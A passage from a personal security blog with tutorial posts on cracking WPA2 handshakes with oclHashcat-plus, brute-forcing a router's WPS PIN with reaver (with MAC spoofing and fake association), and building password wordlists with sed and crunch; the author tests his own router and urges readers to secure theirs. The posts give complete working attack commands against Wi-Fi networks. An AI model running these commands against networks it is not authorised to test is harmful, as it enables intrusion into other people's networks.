A day with Tape

WPA Cracking with oclHashcat-plus

2012-02-06T17:42:00.018+01:00

oclHashcat-plus is a CPU / GPU password cracker with a huge number of options able to
handle a myriad of hash types.

I will go through steps I took to test the cracking of a WPA2 .cap file from my test setup.

I will be using BackTrack5 R1 to capture the .cap file with 4-way handshake and to create the required
.hccap file but will carry out the actual cracking of the .hccap file on a Win7 PC.
This as I am still worried that my knack of fubarring things up could prove life-threatening if I screw up a BTR1 HDD install on my main machine ;) so I'll stick with using a VM image for the time being..
lols..

PREPARATION
===============
First things first, I want to use aircrack to create the .hccap file from a standard .cap file using the new
-J option in aircrack as oclHashcat does not work with the standard .cap files.
The aircrack version included on the stock install of BT5R1 does not yet have this option -J included, so we need to get the latest and greatest from the aircrack site and do the necessary to install.

Grab the latest build of aircrack here (last one in the list at time of writing 06-02-2012 was r2061);
http://nightly.aircrack-ng.org/aircrack-ng/trunk/
extract and cd to directory;
tar -xzf aircrack-ng-trunk-2012-02-05-r2061.tar.gz
cd aircrack-ng-trunk-2012-02-05-r2061

To be able to correctly install the latest aircrack some additional installs required before trying to install aircrack;
(reference; http://hashcat.net/forum/thread-816.html)
apt-get install libssl-dev
(I had previously installed this hence the mention already the newest version)
Then from within the aircrack directory install with ;
make
make install

To update aircrack manually with previously downloaded files, there is a good detailed blogpost
brought to my attention by a reader here http://www.kknd.com.br/security/01/ on how to do that.

Using either of the above methods, you should be ready to rock and roll with the latest aircrack-ng.

Edit 10-02-2012

Backtrack repositories have been updated, the aircrack now included is
v1.1 r2076, so;

apt-get update

apt-get upgrade
will also get you a current version of aircrack which includes the -J switch.

CAPTURING THE WPA HANDSHAKE
===============
To start the process of capturing the handshake first place the wireless interface in monitor mode using airmon-ng;

airmon-ng
airmon-ng start wlan0

and then fire up airodump with options to focus only on your target AP, in my case ;

airodump-ng mon0 -c 11 -t wpa -d 98:FC:11:8E:0E:9C -w capture

When the handshake is captured, either by patiently waiting for a client to connect, or by forcing a
connected client to disconnect/reconnect with for instance aireplay-ng, this will be noted at the top right hand side of the airodump window.
We can then stop airodump and verify that the handshake is captured with aircrack ;

aircrack-ng capture-01.cap

Now we have our .cap file with 4-way handshake, we need to convert it to .hccap format so that we
can use oclHashcat on it.
To do this we use the -J option in aircrack ;
(again, this option only available in the later aircrack builds, not in the stock install on BT5R1)

aircrack-ng capture-01.cap -J capture

Now we have our .hccap file, I will be switching to my Win7 PC for the actual oclHashcat cracking.
(yeah yeah..I know.. a bit of a fail... ;) )

OCLHASHCAT-PLUS
===============
First of course to download the latest oclHashcat-plus (at time of writing 06-02-2012 v0.07) if you haven't already done so and extract it to where you want, I extracted all files to ;
c:\oclHashcat\

Open up the command prompt ;
Start --> Run --> cmd
And move to the directory where you extracted the oclHashcat files to, in my case ;

cd c:\oclHashcat

I am running a 64bit Windows 7 system with an nVidia card (CUDA) so I need to run the cudaHashcat-plus64.exe file, with --help for further info ;

cudaHashcat-plus64.exe --help

All the info may seem somewhat overwhelming, it certainly did to me, so herewith just a couple of
examples on how it can be used.

I copied the capture.hccap previously created to the oclHashcat directory on the Windows system as
'capture_fubar.hccap'

DICTIONARY ATTACK
===============
I will be using the rockyou dictionary as an example as it is a fairly large one, and copied the rockyou.txt file to the oclHashcat directory for easy access.

To start the crack, we need to specify ;
> The version of oclHashcat we need to use
in my case the 64bit version for cuda enabled cards, for ATI cards, you would use the ocl version.
> -m [hash type #] (see number references for hash types at bottom of help section)
in this case '2500' which is used for WPA/WPA2.
> The path to the hash file / hccap file
in this case 'capture_fubar.hccap' in the same directory.
> The path to the dictionary we are using for the attack
in this case 'rockyou.txt' in the same directory.

cudaHashcat-plus64.exe -m 2500 capture_fubar.hccap rockyou.txt
Press 's' to get an updated status report (I hit enter first to create as space between status reports)

oclHashcat went through over 11,5million passphrases in 2min15sec at around 54k passphrases a second..

Increasing the load on the GPU with the -n option can increase performance and the number of passphrases checked per second ;

cudaHashcat-plus64.exe -m 2500 -n 80 capture_fubar.hccap rockyou.txt

So with the increased load on the GPU it went from around 54k passphrases/sec to around 64k passphrases/sec.

MASK (BRUTEFORCE) ATTACK
===============

From what I read oclHashcat-plus is not yet able to mask bruteforce in increments (so first testing 8 characters then 9, then 10 etc) so you need to test that manually.
However not completely sure on the bruteforce options to be honest as I see in the WIKI there are specific
bruteforce options mentioned, but I can't seem to get that working as of yet.
Reading up ;)

The masked bruteforce attack works by defining character sets to use (if custom character sets are required),
and then uses the masks to define in which position in the passphrase the charsets should be used.

There are various predefined charsets, among which ;
?l -- lower case alpha
?u -- upper case alpha
?d -- numeric values
?s -- special characters including space

To start a mask / bruteforce attack, you need to specify ;

> The version of oclHashcat you need to use
> -m [hash type #] (-m 2500 for WPA/WPA2)
> -a [attack mode #] (-a 3 for bruteforce).
> The custom character sets (if any).
> The path to the hash file / hccap file.
> The mask to use.

The mask used has to match the length of the password, so if testing for a 8 digit password
you have to enter 8 mask entries.

If for instance testing all uppercase values for an 8 character password ;

cudaHashcat-plus64.exe -m 2500 -a 3 capture.hccap ?u?u?u?u?u?u?u?u

If testing for numeric values only for an 8 character password ;

cudaHashcat-plus64.exe -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d

If we know that for an 8 digit password the 1st 4 digits of the password are numeric values and the last 4 digits are upper case values, then you would specify that as follows ;

cudaHashcat-plus64.exe -m 2500 -a 3 capture.hccap ?d?d?d?d?u?u?u?u

CUSTOM CHARSETS

You can define upto 4 custom charsets to be used, this is done by using the switches ;
-1, -2, -3, -4

So thinking of our above dictionary crack, for the sake of argument, lets say we know the passphrase
used is a 4 digit number only containing the numbers 1 2 3 4 followed by 6 upper case values only containing the letters Y T R E W Q.

We could create a custom charset containing the numbers 1234 and specify these to be used for the
first 4 digits of the passphrase.
and also create a second custom charset containing YTREWQ and specify these to be used for the last 6 digits of the passphrase.
In the mask you would then specify where to use the 1st custom charset and where to use the 2nd custom charset with ?1 for the 1st custom charset and ?2 for the 2nd custom charset as follows ;
Of course this is not a terribly realistic scenario .. but hey, you get the idea..

cudaHashcat-plus64.exe -m 2500 -a 3 -1 1234 -2 YTREWQ capture_fubar.hccap ?1?1?1?1?2?2?2?2?2?2

If you were to actually know that the first 4 digits of the passphrase are '1234' followed by 6 uppercase alpha values then you can define the 1st 4 values of '1234' directly in the mask ;

cudaHashcat-plus64.exe -m 2500 -a 3 -n 80 capture_fubar.hccap 1234?u?u?u?u?u?u

Of course the above examples are for the purpose of explanation only and probably not realistic for real-world scenarios, but I hope it shows at least a small part of how oclHashcat-plus can work.

oclHashcat-plus is truly an awesome bit of kit, the speeds are certainly astonishing to me since I was used
to non-GPU speeds before ;) 30 minutes to get through an 8 digit numeric wordlist ?!! awesome..
And thats just on my nVidia GTX590 which sux big time compared with the benchmarks I see on hashcat's site for the ATI cards..

There are many, many other options I need to get my head around; rules, dictionary mangling, bruteforce, the list goes on and on .. !
A lot more reading and testing required...

A good hint is to to also checkout the GUI for oclHashcat, it gives you a quick visual view of the commands
that you are using so that you can trouble shoot what you are doing wrong when trying just on the command line.

If I messed up anywhere on the above, please comment on it, have just started out trying hashcat so learning as I go !

Linkage/Credits;

http://hashcat.net/oclhashcat-plus/

http://danielweis.wordpress.com/2011/10/13/gpu-password-cracking-of-wpa-using-airodump-oclhachcat-gui-a-basic-how-to/

d3ad0ne's awesomeness ;
http://ob-security.info/?p=31
http://pauldotcom.com/2010/10/your-password-cracking-system.html
http://ob-security.info/?p=274

Cracking WPA using the WPS vulnerability with reaver v1.3

2012-01-18T23:33:00.034+01:00

REAVER > WPS

WPS functionality leaves some routers at risk, even when WPS is 'not configured / disabled'..
=====================================================================

I am sure everyone has already seen by now, the WPS function, which is present on nearly
all current routers, has been proven to be vulnerable (on some routers) to a 2 stage bruteforce
attack on the router's 8 digit pin.
An extract from the readme from the author's google code page
http://code.google.com/p/reaver-wps/wiki/README ;

Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin
The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10^4 (10,000) possible values for the first half of the pin and 10^3 (1,000) possible values for the second half of the pin, with the last digit of the pin being a checksum.

Now as soon as I had heard about this tool, I immediately checked to make sure that WPS was not configured on my router.
As I always configure it manually, I was pretty sure WPS was disabled, and as I thought, WPS was not configured.

Router information ; Cisco Linksys E1000 v2.0, Firmware v. 2.0.01
I checked the router settings, made sure WPS was not configured then rebooted router ;

Little did I know that even though I had chosen to not to use WPS, WPS was not in fact disabled and the router was still vulnerable, which I found out after seeing it was mentioned to be the case on the BackTrack forums and checking my own setup lateron ...
WTF..
In retrospect, the term "Configuration view" does not say whether it is, or is not configured/enabled....
Well played ~~lawyers~~ Linksys...

I could not find any other possibility to alter the WPS settings on the router or any way to disable the PIN.
(There is actually a firmware upgrade for the router; v2.1.02, issued on 25-05-2011, so although the update may prevent the WPS vulnerability or give more options to REALLY disable WPS, I haven't checked its possibilities as yet).

Fired up BackTrack and specified airodump to focus only on my AP and to capture packets.
airmon-ng start wlan0
airodump-ng mon0 -c 11 -t wpa -d 98:FC:11:8E:0E:9C -a -w wps_test

After just a few packets captured stopped capture and checked in Wireshark to see if any info on WPS..

lolwut ?!

Downloaded and installed reaver (as of this date 18-01-2012 reaver v1.3)
http://code.google.com/p/reaver-wps/

tar -xzf reaver-1.3

cd reaver-1.3

cd src/

./configure

make && make install

and used reaver's included 'walsh' to check my AP (walsh was later renamed to wash) ;

walsh

Testing Walsh ;
walsh -i mon0 -c 11 -C -s
(just a simple walsh -i mon0 worked fine for me as well by the way, just limiting results with the above)

Damn..

OK, so decided to see whether it actually was still vulnerable and so started reaver and let it do its thing.

I got many warnings that 10 attempts failed in a row, receive timeout issues etc, so I basically did a few
hours 3 days in a row, reaver saves the previous session in any case, so you can do it as and
when you please..
Tested on a Samsung N110, Atheros chipset, ath5k drivers for the wireless.

reaver -i mon0 -f -c 11 -b 98:FC:11:8E:0E:9C -vv -x 60

Anyway, the final outcome.. BAH !

damn.. hacked.. !
And here I was thinking I was nice and cosy in my "secure WPA2" world..
The time used as mentioned above is not completely accurate as I had split the crack over 3 days with
a few hours at a time, would imagine that in total it took between 10 - 12 hours in my case, possibly a couple of hours more.

I had better results (less errors) when using a wireless adapter with REALTEK RTL8187L chipset with
the rtl8187 driver.

So, what to do ?
Well, in my case, I bought a different/better router the day after I figured out that my router was still vulnerable.. screw it.. otherwise I was going to stay feeling uncertain ;)

Other cheaper options ;
> Check for firmware updates, possibly a revised firmware is available to counter the vulnerability.
> Use 3rd party firmware (if supported) such as the likes of Open WRT or DD-WRT.
(DD-WRT for instance does not support WPS and is therefore not vulnerable to the reaver attack)

Edit 22-01-2012
--------
My previous remarks on MAC spoofing being an issue were incorrect.
RTFM TAPE .. :|
http://code.google.com/p/reaver-wps/wiki/FAQ
The way reaver works with mac spoofing is to ensure that the Physical interface also has the mac spoofed.

Depends on your setup, however in my case
> wlan0 physical interface.
> mac address 00:11:22:33:44:55 as the mac address to be spoofed.
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
airmon-ng start wlan0

monitor mode then enabled on the created mon0 interface

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig wlan0 up

ifconfig mon0 up

Then start up the reaver attack and it should all run as intended.
--------

Edit 28-01-2012
--------
I have been having issues with the latest version of reaver; v1.4, with it failing to associate
whereas v1.3 associated fine.
Apparently there are others also having issues when running it on BT5, some also seem
to report that an apt-get update && apt-get upgrade on the BT5 system is what caused
the problems for them.

http://code.google.com/p/reaver-wps/issues/detail?id=172

For the time being the author of reaver simply advises to stick with Ubuntu v10.4 which is
his testing platform.

So if you having trouble with reaver v1.4, perhaps try the previous version; reaver v1.3.

http://code.google.com/p/reaver-wps/downloads/list

Would appreciate anyone's feedback on their experiences with v1.4 if there are any.
--------

Update 04-02-2012
--------

Well I have made some progress with reaver v1.4, the below done on a VMware BT5R1 image.

Installed reaver v1.4 from the BT repositories ;
apt-get update
apt-get install reaver

reaver v1.4 includes the new wash (formerly walsh)

wash

Carried out a quick scan with wash to get the details of my (now committed to the shelf of shame..) router.
Using a wireless adapter with Realtek RTL8187L chipset with rtl8187 driver in this case.
Started the wireless interface on the channel of my AP (Channel 11)
(as was having issues with aireplay-ng when I had not specified the channel that should be used)
airmon-ng start wlan0 11
wash -i mon0 -C

Now previously I was having trouble getting reaver v1.4 to associate to my router for some reason, so
I decided to try to associate with another application, and then use the -A switch in reaver so as to not
have reaver itself associate.

So started aireplay-ng with fake association options.
I found that having a longer delay resulted in a better performance with reaver, but you will have to play around to see what works best for your setup.

aireplay-ng mon0 -1 120 -b 98:FC:11:8E:0E:9C -e FUBAR
( I believe I possibly should have used the -a switch instead of the -b switch for the AP MAC, I always get confused with what to use when with aireplay-ng .. ah well, with the essid specified it worked anyway ;) )
correct syntax ;
aireplay-ng mon0 -1 120 -a 98:FC:11:8E:0E:9C -e FUBAR

Then fired up reaver v1.4 ;

reaver

and started reaver v1.4 with the -A switch, to not have reaver associate with the router itself, in a separate terminal window ;

reaver -i mon0 -A -b 98:FC:11:8E:0E:9C -v
( there is a lot more output with reaver v1.4, wherefor only the single -v )

The result ;
A continuous stream of 2 seconds per pin attempt, which is much better than previously encountered
with v1.3 to be honest.

So, at least there is a work around, however still strange that reaver v1.4 won't work 'out of the box'
for me on BT.. Oh well, maybe v1.5 will be released to straighten things out ;)
--------

This type of attack is a real problem for many people and it would be more than foolish not to check your routers asap.

So .. check your routers asap !

Wordlist manipulation revisited

2011-07-24T23:02:00.183+02:00

Work In Progress !

Update 18-12-2011
-------------------------
I have updated WLM to v0.3, many updates and improvements, but main ones ;
> Updated split options to also accept size (in MB only) input.
> Included removal/deletion options
> Included an updated and improved datelist script for creating wordlists based on dates.
> Included SSIDstrip to create wordlists from Kismet generated .nettxt files.
> Tidied it up, made the scripts more 'uniform'.

DOWNLOAD;
edit 19-12-2011 17:00 ;
there was an error in the suffixing of numeric values
on version uploaded earlier today (19-12-2011)
Latest and greatest and hopefully without errors ;

http://www.mediafire.com/file/4zbivw8ih21jzg4/wlm_v0-3

Feedback appreciated !

Update 18-10-2011
---------------------

--------------------------------------------

INTRO

After my posts from just over 2 years ago (wow... thought I would have learned more by now .. )
I thought it would be a good idea to have another, more detailed post on wordlist manipulations based on 'simple' one-liners or simple scripts (sometimes 1 line just doesn't cut it) which can be run over the wordlist.

For some reason I always manage to forget the best way to do the simplest of things using sed and the like, so this is as much a reference for me, as it is hopefully some help to those looking for quick answers !
My intention is that queries on wordlist manipulation posted in the comments are looked at and tested
and then, I will try to post the best solution in doing same.

There will be quite a bit duplication from the previous post on wordlist manipulation, but no harm in that,
I find myself returing to 'old' info all the time..

MANIPULATING WORDLISTS

When you have a wordlist, it often needs fine-tuning or alteration of some kind in order to get the
most out of it, sometimes heavy-duty alteration, other times minor adjustments such as splitting the wordlist into manageable sizes or capitalizing the first letter for instance.

The below examples are based on wordlists that have already been created and need some sort of tweaking or fine tuning.
Of course you can create wordlists from scratch how you like with for instance crunch, however this post is meant solely for altereing existig wordlists/

Note that the below examples all done on BackTrack5 and not tested on any other OS.

SPLITTING WORDLISTS

One of the main issues with wordlists is that they can get hellish big.. and you may need to split them for;
> for easy storage on portable drives,
> some programs only accept a certain maximum wordlist size,
> distributing segments of the wordlists to have tested by others,
etc.
etc.

First thing to do is to check the size of the file and how many lines(passphrases) are in it so you can estimate
how you can best split it.
In this case using a 6 digit wordlist with lowecase alpha values only.
Check the size of the wordlist ;
For info on size in bytes ;

du -b wordlist1.txt

or
Simple view of size in 'human readable' format (eg. 100K, 100M, 100G);

du -h wordlist1.txt

Get the linecount of the wordlist ;

wc -l wordlist1.txt

So in the above example the size is around 112MB and there are 16777216
lines (so 16777216 passphrases).
When using split to split wordlists, it is best to use split by line count, so that you don't accidentally split the actual words as can happen when you split by size.

Lets say we want to split that file into 3 wordlists, then the above file would need to be split into files containing +-5.500.000 words each.
If you are too lazy to work the little grey cells, let 'bc' do the work for you so you can make an educated guess on how many lines you want to have per split wordlist ;

echo "16777216 / 3" | bc

split -d -l 5600000 wordlist1.txt split-list

-d == giving a numeric suffix to the created split-list prefixes
-l == giving the number of lines you want each file to have as a maximum
wordlist1.txt is the input wordlist
splitlist is the prefix for the newly created split files.

JOINING/COMBINING WORDLISTS

To actually combine seperate wordlists to one list, you can use the 'cat' command as follows ;
cat wordlist1.txt wordlist2.txt > combined-wordlist.txt

Depending on the size of your wordlists this can take a wee while..

You can also combine all .txt files in a directory to one larger file ;
cat *.txt > combinedlists.txt

CHANGING THE 'CASE' OF LETTERS IN A WORDLIST

Changing characters in a wordlist at a given position to either lower case or upper case is a frequent necessity.
Of course wordllists can easily be created with the required case in the required position (see my post on using the awesome crunch) however if you have an existing wordlist (which this post is all about) and need
to adjust the cases as required, this is (one of the ways) how to go about it.

CAPITALIZING FIRST AND/OR LAST LETTERS

First letter;
sed 's/^./\u&/' wordlist.txt

Last letter;
sed 's/.$/\u&/' wordlist.txt

CHANGING LETTERS TO LOWER / UPPER CASE

Changing the first letters of all entries to upper case ;
sed 's/^./\u&/' wordlist.txt

Changing the last letter of all entries to upper case ;
sed 's/.$/\u&/' wordlist.txt

Changing the first letter of all entries to lower case ;
sed 's/^./\l&/' wordlist.txt

Changing the last letter of all entries to lower case ;
sed 's/.$/\l&/' wordlist.txt

Changing all upper case to lower case letters;
tr '[:upper:] ' '[:lower:]' < wordlist.txt

Changing all lower case to upper case letters;
tr '[:lower:]' '[:upper:]' < wordlist.txt

Inverting the case in the words ;

tr 'a-z A-Z' 'A-Z a-z' < wordlist.txt

or
sed 'y/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz/' wordlist.txt

PREFIXING CHARACTER(S)/WORDS TO WORDLISTS

To prefix the word "test" to all lines in the wordlist ;
sed 's/^./test/' wordlist.txt
or
awk '{print "test" $0 }' wordlist.txt

PREFIXING NUMERIC VALUES TO WORDLISTS

To prefix 1 digit in sequence from 0 - 9 ;
for i in $(cat wordlist.txt) ; do seq -f %01.0f$i 0 9 ; done > numbers_wordlist.txt

To prefix 2 digits in sequence from 00 - 99 ;
for i in $(cat wordlist.txt) ; do seq -f %02.0f$i 0 99 ; done > numbers_wordlist.txt

To prefix upto 2 digits in sequence from 0 - 99 ;
for i in $(cat wordlist.txt) ; do seq -f %01.0f$i 0 99 ; done > numbers_wordlist.txt

To prefix 3 digits in sequence from 000 - 999
for i in $(cat wordlist.txt) ; do seq -f %03.0f$i 0 999 ; done > numbers_wordlist.txt

To prefix upto 3 digits in sequence from 0 - 999 ;
for i in $(cat wordlist.txt) ; do seq -f %01.0f$i 0 999 ; done > numbers_wordlist.txt

SUFFIXING CHARACTER(S)/WORDS TO WORDLISTS

To suffix the word "test" to each line in the wordlist ;
sed 's/.$/test/' wordlist.txt
or
awk '{print $0 "test"}' wordlist.txt

SUFFIXING NUMERIC VALUES TO WORDLISTS

To suffix 1 digit in sequence from 0 - 9

for i in $(cat wordlist.txt) ; do seq -f $i%01.0f 0 9 ; done > wordlist_numbers.txt

To suffix 2 digits in sequence from 00 - 99
for i in $(cat wordlist.txt) ; do seq -f $i%02.0f 0 99 ; done > wordlist_numbers.txt

To suffix upto 2 digits in sequence from 0 - 99 ;
for i in $(cat wordlist.txt) ; do seq -f $i%01.0f 0 99 ; done > wordlist_numbers.txt

To suffix 3 digits in sequence from 000 - 999 ;
for i in $(cat wordlist.txt) ; do seq -f $i%03.0f 0 999 ; done > wordlist_numbers.txt

To suffix upto 3 digits in sequence from 0 - 999 ;

for i in $(cat wordlist.txt) ; do seq -f $i%01.0f 0 999 ; done > wordlist_numbers.txt

INCLUDE CHARACTERS AT SPECIFIC POSITION

To include the word "test" after the first 2 characters ;
sed 's/^../&test/' wordlist.txt
or
sed 's/^.\{2\}/&test/' wordlist.txt

To include the word "test" before the last 2 characters ;
sed 's/..$/test&/' wordlist.txt
or
sed 's/.\{2\}$/test&/' wordlist.txt

REPLACE X NUMBER OF CHARACTERS FROM START OF WORDLIST

To replace the first character of each word with "test" ;
sed 's/^./test/' wordlist.txt

To replace the first 2 characters of each word with "test" ;
sed 's/^../test/' wordlist.txt

To replace the first 3 characters of each word with "test" ;
sed 's/^.../test/' wordlist.txt
or
sed 's/^.\{3\}/test' wordlist.txt

REPLACE/SUBSTITUTE X NUMBER OF CHARACTERS FROM END OF WORDLIST

To replace the last character of each word with "test" ;
sed 's/.$/test/' wordlist.txt

To replace the last 2 characters of each word with "test" ;

sed 's/..$/test/' wordlist.txt

To replace the last 3 characters of each word with "test" ;

sed 's/...$/test/' wordlist.txt

sed 's/.\{3\}$/test/' wordlist.txt

REPLACE/SUBSTITUTE CHARACTER(S) AT A CERTAIN POSITION

To subsitute the third character of each word in the wordlist ;

sed -r "s/^(.{2})(.{1})/\1test/" wordlist.txt
or
sed 's/^$.\{2\}$$.\{1\}$/\1test/' wordlist.txt

To subsitute the third and fourth character of each word in the wordlist with "test" ;
sed -r "s/^(.{2})(.{2})/\1test/" wordlist.txt

To subsitute the fourth character of each word in the wordlist with "test" ;

sed -r "s/^(.{3})(.{1})/\1test/" wordlist.txt

To subsitute the fourth and fifth character of each word in the wordlist with "test" ;
sed -r "s/^(.{3})(.{2})/\1test/" wordlist.txt

NOTE!

If the number of characters that are to be replaced are actually more than there

are characters in the word, the word will remain unaltered.

So if doing

sed -r "s/^(.{3})(.{2})/\1test/" wordlist.txt

4 character letters such as the word 'beta' would not be altered as there is no fifth character.

REVERSE THE DIRECTION OF THE WORDS IN WORDLIST

rev wordlist.txt

REMOVING WORDS WHICH DON'T HAVE 'X' NUMBER OF NUMERIC VALUES

To remove words from wordlist.txt that do not have 3 numeric values

nawk 'gsub("[0-9]","&",$0)==3' wordlist.txt

REMOVING WORDS WHICH HAVE MORE THAN 2 IDENTICAL ADJACENT CHARACTERS

sed '/$[^A-Za-z0-9_]\|[A-Za-z0-9]$\1\{2,\}/d' wordlist.txt

Some great bit of work from Gitsnik on manipulating wordlists to ignore words with

more than 2 adjacent identical characters ;
http://gitsnik.blogspot.com/2011/08/unique-characters-from-crunch-redux.html

APPENDING WORDS FROM 1 WORDLIST TO ALL THE WORDS IN ANOTHER WORDLIST

See Wordlist Manipulator script at top of page
..
..
..
Please leave your comments, suggestions, mocking words of wisdom..etc.. so that the post can benefit from
the vast amount of knowledge out there.

Creating wordlists with crunch v3.0

2011-05-22T20:33:00.019+02:00

CRUNCH v3.0

Warning... this is a looong post, grab a beverage.. ;) Also heavy on images..

PRE-INTRO

Since the post on Creating wordlists with crunch v2.4 made in April last year, crunch has gone through
quite a few changes and improvements and bofh28 has now released v3.0 ! (on 16-05-2011)
To make sure that the information on this blog is staying upto date, its time for a new and improved post.
There will be a lot of duplication from my previous post on crunch, but it should then at least
be a more or less full and complete post.

I have tried to follow the alphabetical order of the options and have done a chapter per option/switch.

Please leave comments should the post be lacking information on anything you feel should be included.

INTRODUCTION

crunch is a tool for creating bruteforce wordlists which can be used to audit password strength.
The size of these wordlists is not to be underestimated, however crunch can make use of patterns to reduce wordlist sizes, can compress output files in various formats and (since v2.6) now includes a message advising the size of the wordlist that will be created, giving you a 3 second window to stop the creation should the size be too large for your intended use.

The full range of options is as follows ;
-b Maximum bytes to write per file, so using this option the wordlist to be created can be split into various
      sizes such as KB / MB / GB (must be used in combination with "-o START" switch)
-c Number of lines to write to output file, must be used together with "-o START"
-d Limits the number of consecutive identical characters (crunch v3.2)
-e Specifies when crunch should stop early (crunch v3.1)
-f Path to the charset.lst file to use, standard location is '/pentest/passwords/crunch/charset.lst
    to be used in conjunction with the name of the desired charset list, such as 'mixalpha-numeric-space'
-i Inverts the output sequence from left-to-right to right-to-left
    (So instead of aaa, aab, aac, aad etc, output would be aaa baa caa daa)
-l When specifying custom patterns with the -t option, the -l switch allows you to identify which of the characters
    should be taken as a literal character instead of a place holder ( @,%^ )
-o Allows you to specify the file name / location for the output, e.g. /media/flashdrive/wordlist.txt
-p Prints permutations of the words or characters provided in the command line.
-q Prints permutation of the words or characters found in a specified file
-r Resumes from a previous session, exact same syntax to be used followed by -r
-s Allows you to specify the starting string for your wordlist.
-t Allows you to specify a specific pattern to use. Probably one of the most important functions !
   Place holders for fixed character sets are ;
     @   -- lower case alpha characters
     ,    --   upper case alhpa characters
     %   -- numeric characters
    ^    -- special characters (including space)
-u Supresses the output of wordlist size & linecount prior starting wordlist generation.
-z Adds support to compress the generation output, supports gzip, bzip & lzma

All the below is done on backtrack 5, only tested on the 32bit versions.
crunch is not installed by default on BT5 and as yet (22-05-2011) not yet in the repo's.
(When it does hit the repo's I will amend this post to reflect installing from repo's)

so download from the source at ;
http://sourceforge.net/projects/crunch-wordlist/
Edit; 29-01-2012
and install as follows;

tar -xvf crunch-3.2.tgz

cd crunch3.2/

make && make install

Edit 12-06-2011
crunch is now available in the BT repositories,
so can download and install on backtrack5 simply by doing a ;

apt-get update
apt-get install crunch

BASIC USAGE AND CHARACTER SETS

The default installation directory / path for crunch in backtrack 5 is

/pentest/passwords/crunch/

All the below examples are based on being in the crunch directory /pentest/passwords/crunch/
To run crunch from outside of crunch's own directory use ;
/pentest/passwords/crunch/crunch [min length] [max length] [ character set] [options]
example from root directory;

/pentest/passwords/crunch/crunch 8 8 abc + + \!\@\# -t TEST^%,@ -o test.txt

Basic usage is as follows to print to screen

./crunch [min length] [max length] [character set] [options]

To write to file use the -o switch ;

./crunch [min length] [max length] [character set] [options] -o filename.txt

If no character set is defined, then crunch will default to using the lower case alpha character set;

./crunch 4 4

Also any desired character set can be enterered manually in the command line ;
./crunch 6 6 0123456789ABCDEF

Certain characters will need escaping with a backslash \ ;

./crunch 6 6 ABC\!\@\#\$

CREATING WORDLISTS IN BLOCKS OF A CERTAIN SIZE

Using the -b switch, we can tell crunch to create a wordlist which is split into multiple files
of user-specified sizes.
This must be done in conjunction with -o START.

The size definition can be; kb, mb, gb or kib, mib, gib
kb, mb, and gb are based on the power of 10 (i.e. 1KB = 1000 bytes)
kib, mib, and gib are based on the power of 2 (i.e. 1KB = 1024 bytes).

The output files will be named after the first and last entry in the wordlists.

To create a wordlist split into files of not more than 1mb;

./crunch 6 6 0123456789 -b 1mb -o START

To create a wordlist split in files of no more than 100mb;

./crunch 8 8 abcDEF123 -b 100mb -o START

To create a wordlist split into files of no more that 10kb;

./crunch 4 4 0123456789 -b 10kb -o START

To create a wordlist split into files of no more than 2gb;

./crunch 8 8 0123456789ABCDEF -b 2gb -o START

etc.
etc.

CREATING WORDLISTS IN BLOCKS OF A CERTAIN LINECOUNT

(ie. number of passphrases per file)

Using the -c switch you can have crunch create wordlists which do not contain more than the
specified number of lines.
This must be used in conjunction with -o START.

To create files containing no more than 200000 (200 thousand) lines (passphrases);
./crunch 6 6 0123456789 -c 200000 -o START

To create files containing no more that 150000 (150 thousand) lines (passphrases);

./crunch 6 6 abcDEF123 -c 150000 -o START

The output files will be named after the first and last entry in the wordlists.

STOPPING CRUNCH WORDLIST GENERATION AT A PRE-DETERMINED TIME

Crunch v3.1 is now also released (20-07-2011) and with it comes the new -e switch.

This option allows you to specify when you want the wordlist generation to stop.

So the below example will start creating the 6 character numeric wordlist, but will stop at 333333 ;
./crunch 6 6 -t %%%%%% -e 333333

USING FIXED CHARACTER SETS

Crunch also comes with fixed character sets in charset.lst which is included in the installation.
(also found in directory /pentest/passwords/crunch/ )

This saves on the typing (and typoes) when dealing with standard character sets.

To use the fixed characters sets, instead of typing in character sets manually in the command line,
you can use the -f switch to specify which character set we want to use ;

To use only upper case alpha characters;

./crunch 6 6 -f charset.lst ualpha

To use only numeric characters ;

./crunch 6 6 -f charset.lst numeric

To use hexidecimal characters (with uppercase alpha values) ;

./crunch 8 8 -f charset.lst hex-upper

To use lower case, uppercase, numeric & special characters (beware of the size ! Don't try to save..lol..) ;

./crunch 8 8 -f charset.lst mixalpha-numeric-all-space

etc.
etc.

Since v2.7 additional Swedish character support has also been added for our Swedish brethren, nicely contributed by Niclas Kroon.

It should be noted that you can easily create your own custom charset by simply including a line in the same format.
If you for instance know that your target has a certain medical condition known as 133tsp34k, and you have an idea of which letters/numbers are usually used (forum posts etc. etc.) , you could simply include an extra line such as ;
1337 = [4bcd3f9hijk1mn0pqr$7uvwxyz]
Doubt the above is authentic enough, but I'm sure you get the idea.
Then just run in crunch as you would any other charset;
./crunch 4 4 -f charset.lst 1337

See /pentest/passwords/crunch/charset.lst for all possibilities / charsets currently included.

INVERTING THE OUTPUT DIRECTION

Using the -i option will invert the direction in which the wordlist is created, from left-to-right to right-to-left.
Note that this does not change the content of the created wordlist, it only changes the intial direction in which it is created.

./crunch 4 4 -i

The -i option can also be used when character sets have been specified, either manually or using the pre-defined charsets.

./crunch 4 4 -f charset.lst ualpha -i

or for instance for creating numeric wordlists in an alternative direction ;

./crunch 8 8 0123456789 -i

If you actually want the wordlist creation to start from the last letter in the alphabet and work backwards, or
work backwards from the last digit in a 10 digit numeric sequence, then you would have to enter the charset manually ;

./crunch 4 4 zyxwvutsrqponmlkjihgfedcba

./crunch 4 4 ZYXWVUTSRQPONMLKJIHGFEDCBA

./crunch 8 8 9876543210

CREATING PERMUTATIONS

Crunch can also be used to create permutations for either ;
> characters / words entered in the command line with the -p switch.
> lines in a wordlist with the -q switch

Although there is no min/max character setting, this still needs to be entered for both
the -p and -q switch.

Using the -p switch you can create permutations of characters or of all words entered in the command line.
Creating permutations of letters (fun for anograms) ;

./crunch 1 1 -p abcd

Creating permutations of lists of words;
./crunch 1 1 -p bird cat dog

